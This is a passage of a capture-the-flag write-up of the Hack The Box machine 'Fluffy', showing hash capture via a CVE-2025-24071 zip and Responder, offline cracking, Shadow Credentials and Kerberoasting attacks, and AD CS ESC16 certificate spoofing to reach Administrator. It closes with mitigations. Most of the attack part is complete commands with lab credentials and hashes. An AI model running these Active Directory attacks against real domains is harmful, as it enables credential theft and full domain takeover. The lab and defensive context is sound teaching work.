┌──(kali㉿kali)-[~/HTB-machine/fluffy/CVE-2025-24071]
└─$ smbclient //10.10.11.69/IT -U j.fleischman%J0elTHEM4n1990! -c "put exploit.zip"
putting file exploit.zip as \exploit.zip (0.3 kb/s) (average 0.3 kb/s)
                                                                        

An administrative cleanup task or user activity triggers the file parsing. Responder successfully intercepts the inbound SMB authentication request from the user p.agila:

Error Loading Image

We save the intercepted hash to a file and crack it offline using John the Ripper and the rockyou.txt wordlist:

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt 

Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
prometheusx-303  (p.agila)     
1g 0:00:00:02 DONE (2025-05-25 07:53) 0.4926g/s 2225Kp/s 2225Kc/s 2225KC/s proquis..programmercomputer
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed. 
                   
  • Cracked Credential: p.agila:prometheusx-303

Lateral Movement & User Compromise

Group Permission Analysis

Our enumeration of Active Directory permissions reveals:

  • The user account p.agila is a member of the SERVICE ACCOUNT MANAGER security group.
  • The SERVICE ACCOUNT MANAGER group holds GenericAll rights over the SERVICE ACCOUNTS group.

Error Loading Image

  • The SERVICE ACCOUNTS group is configured with GenericWrite privileges over several critical service accounts, including ca_svc, winrm_svc, and ldap_svc.

Error Loading Image

Exploiting Group Membership Delegation

Since p.agila has GenericAll over the SERVICE ACCOUNTS group, we use bloodyAD to add p.agila as a member of the SERVICE ACCOUNTS group. This grants p.agila direct delegation control over the service accounts.

1
2
3
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ bloodyAD --host 10.10.11.69 -d fluffy.htb -u p.agila -p 'prometheusx-303' add groupMember 'Service Accounts' p.agila
[+] p.agila added to Service Accounts                                       

Shadow Credentials Attack (winrm_svc)

Initially, we try targeted Kerberoasting against the service accounts to extract TGS hashes:

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ python3 targetedKerberoast.py -v -d 'fluffy.htb' -u 'p.agila' -p 'prometheusx-303' 

[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ca_svc)
$krb5tgs$23$*ca_svc$FLUFFY.HTB$fluffy.htb/ca_svc*$9af66f97250096b8559310e135d7f7a2$5484c416759e38f3f199d20eb5e85c9fe3d49f7b7042ad3377a5bbbd56ff6189b26ae79394122bddac55503508cb778ebd21d4bcbcb0c72ecad4ebc6967bf0de058bd3a24ae7706a646549613c85018d5a4ebbee5e28f625cdd71f50fe23301cb2c0ffb61f647a2d373cc7aeef1d45c4af9299e85642ce58c6dcada73289290fb659f51875010bf45901e56c339ac3c06628ea833f659daaddae662cedc3b7ff6a8dce0aeb90cb227fbe49f1b7e7f23495bdd2372ef00703b2d1eabff9fba310e0734b3131690be71a06390b0ee79de16b6d62643c4a5bb2a94496a32e5f809008ea788a92c4eafecd9703c4920a36e29f4cb33df757a2d86c701a94566c4619cc23fbbccf7914c33e3377e40b1c80872ffcf983c6925b0c699701c747c9b03d2f58c64574f1f9d3575bf934c48b00f464076bc75026d8da5207c6fffae5dfb311336cd9a256610244d62cc40f40e2a7e4
.
.
.

The hashes extracted are complex and cannot be cracked using offline wordlists. As an alternative, since the Service Accounts group has GenericWrite permissions over the target accounts, we execute a Shadow Credentials attack. A Shadow Credentials attack exploits write access on an object’s msDS-KeyCredentialLink attribute. We populate the attribute with a key credential mapping containing a custom certificate public key. We then use the certificate to request a Kerberos TGT via PKINIT and retrieve the account’s NT hash.

We target the winrm_svc user account using Certipy:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ certipy-ad shadow auto -username P.AGILA@fluffy.htb -password 'prometheusx-303' -account WINRM_SVC                  
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'c08bbd98-3dd7-8f4a-e78c-91119cf8855f'
[*] Adding Key Credential with device ID 'c08bbd98-3dd7-8f4a-e78c-91119cf8855f' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID 'c08bbd98-3dd7-8f4a-e78c-91119cf8855f' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Using principal: winrm_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767

Using the retrieved NT hash for winrm_svc, we login using evil-winrm and read the user flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ evil-winrm -i $IP -u winrm_svc -H '33bd09dcd697600edf6b3a7af4875767'               
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\winrm_svc\Documents> type ..\Desktop\user.txt
**********ba5b84feed2107fa7af
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> exit

Privilege Escalation: AD CS ESC16 Abuse

Vulnerability Explanation

The Privilege Escalation ADCS ESC 16 misconfiguration arises when Active Directory Certificate Services (AD CS) CA configurations run without the security extensions enabled (such as 1.3.6.1.4.1.311.25.2 for enforcing strong security SID mapping in certificate attributes). This allows an attacker to request certificates on behalf of other users using standard templates (like User) where the authentication context maps identity purely based on the User Principal Name (UPN) SAN attribute. If an attacker has write permissions over a target account’s UPN, they can modify it to match a target administrator UPN, request the certificate, retrieve the certificate mapped to the administrator, and then revert the UPN modification to hijack the target identity.

Exploitation Step 1: Compromising the ca_svc Account

We execute another Shadow Credentials attack, this time targeting the ca_svc account:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ certipy-ad shadow auto -username P.AGILA@fluffy.htb -password 'prometheusx-303' -account CA_SVC   
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '24dac53a-f906-d5fa-9a02-f58b3b15029c'
[*] Adding Key Credential with device ID '24dac53a-f906-d5fa-9a02-f58b3b15029c' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '24dac53a-f906-d5fa-9a02-f58b3b15029c' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
                                                            

Exploitation Step 2: AD CS Enumeration

Using the ca_svc credentials, we run Certipy to enumerate vulnerable templates and discover the CA configuration:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
┌──(certipy-venv)(kali㉿kali)-[~/HTB-machine/fluffy/Certipy-5.0.2]
└─$ certipy find -vulnerable -u ca_svc@fluffy.htb -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -stdout
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: FLUFFY.HTB.
[!] Use -debug to print a stacktrace
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[!] DNS resolution failed: The DNS query name does not exist: DC01.fluffy.htb.
[!] Use -debug to print a stacktrace
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : fluffy-DC01-CA
    DNS Name                            : DC01.fluffy.htb
    Certificate Subject                 : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
    Certificate Serial Number           : 3670C4A715B864BB497F7CD72119B6F5
    Certificate Validity Start          : 2025-04-17 16:00:16+00:00
    Certificate Validity End            : 3024-04-17 16:11:16+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Disabled Extensions                 : 1.3.6.1.4.1.311.25.2
    Permissions
      Owner                             : FLUFFY.HTB\Administrators
      Access Rights
        ManageCa                        : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        ManageCertificates              : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        Enroll                          : FLUFFY.HTB\Cert Publishers
    [!] Vulnerabilities
      ESC16                             : Security Extension is disabled.
    [*] Remarks
      ESC16                             : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates                   : [!] Could not find any certificate templates                                                                                         

The output confirms the ESC16 misconfiguration exists because the security SID mapping extension (1.3.6.1.4.1.311.25.2) is disabled on the fluffy-DC01-CA authority.

Exploitation Step 3: Certificate Spoofing

Using p.agila’s permissions, we update the UPN mapping of the ca_svc account to administrator:

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~/HTB-machine/fluffy/Certipy-5.0.2]
└─$ certipy account -u 'p.agila@fluffy.htb' -p'prometheusx-303' -target 'dc01.fluffy.htb'  -upn 'administrator' -user 'ca_svc' update

Certipy v5.0.2 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: dc01.fluffy.htb.
[!] Use -debug to print a stacktrace
[*] Updating user 'ca_svc':
    userPrincipalName                   : administrator
[*] Successfully updated 'ca_svc'

Next, we request a certificate using ca_svc credentials against the standard User certificate template. Because the CA evaluates UPN mappings dynamically and does not validate SIDs (due to ESC16), it generates a certificate containing administrator as the identity.

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/HTB-machine/fluffy/Certipy-5.0.2]
└─$ certipy req -dc-ip '10.10.11.69' -u 'ca_svc@fluffy.htb' -hashes :ca0f4f9e9eb8a092addf53bb03fc98c8 -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 18
] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

We immediately restore the UPN of the ca_svc account to avoid service disruption:

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~/HTB-machine/fluffy/Certipy-5.0.2]
└─$ certipy account -u 'p.agila@fluffy.htb' -p'prometheusx-303' -target 'dc01.fluffy.htb' -upn 'ca_svc' -user 'ca_svc' update

Certipy v5.0.2 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: dc01.fluffy.htb.
[!] Use -debug to print a stacktrace
[*] Updating user 'ca_svc':
    userPrincipalName                   : ca_svc
[*] Successfully updated 'ca_svc'

Exploitation Step 4: Administrator Authentication

Using the forged administrator.pfx certificate, we perform PKINIT authentication against the Domain Controller to request a TGT and retrieve the NTLM hash of the built-in Administrator account.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿kali)-[~/HTB-machine/fluffy/Certipy-5.0.2]
└─$ certipy auth -pfx administrator.pfx -domain fluffy.htb -dc-ip 10.10.11.69

Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e                                         

We authenticate as the Administrator using evil-winrm and the NTLM hash to retrieve the root flag:

1
2
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ evil-winrm -i $IP -u administrator -H '8da83a3fa618b6e3a00e93f676c92a6e'

Mitigations & Security Recommendations

1. Hardening AD CS Settings (Remediate ESC16)

  • Enable Strong SID Bindings: Enforce SID authentication mapping on the Active Directory Certificate Authority (CA) by enabling the SID mapping extension (1.3.6.1.4.1.311.25.2). Update the registry values on the CA server to require strong bindings for Kerberos authentication.
  • Limit UPN Write Permissions: Enforce strict access control limits on user accounts so low-privilege accounts or group members cannot update UPN attributes (userPrincipalName) on service accounts or other users.

2. Safeguard against Client-Side Spoofing (CVE-2025-24071)

  • Registry and File-Handling Policies: Disable or restrict the execution and parsing of Library Description files (.library-ms) across corporate systems where possible, or monitor their usage.
  • SMB Outbound Traffic Filtering: Filter and block outbound SMB connections (ports 139 and 445) from workstation networks to external IP addresses to prevent NTLM hash leakage to external listeners.

3. Restrict Directory Permissions and Shadow Credentials Attack Vector

  • Audit Write Attributes: Limit write access (specifically GenericWrite and WriteProperty for msDS-KeyCredentialLink) on user and computer accounts to prevent unauthorized addition of key credentials.
  • Implement Tiered Administration: Do not place administrative users or managers in security groups that delegate control over service accounts (ca_svc, winrm_svc). Keep management accounts distinct and tier-restricted.

4. Enable Logging and Intrusive Alerts

  • PKINIT Monitoring: Monitor Windows Directory Service events for certificate-based authentication requests containing no SID mappings.
  • UPN Modification Tracking: Establish audit policies (Event ID 4738: “A user account was changed”) to monitor changes to the userPrincipalName attribute on all domain accounts, specifically targeting service accounts.
This post is licensed under CC BY 4.0 by the author.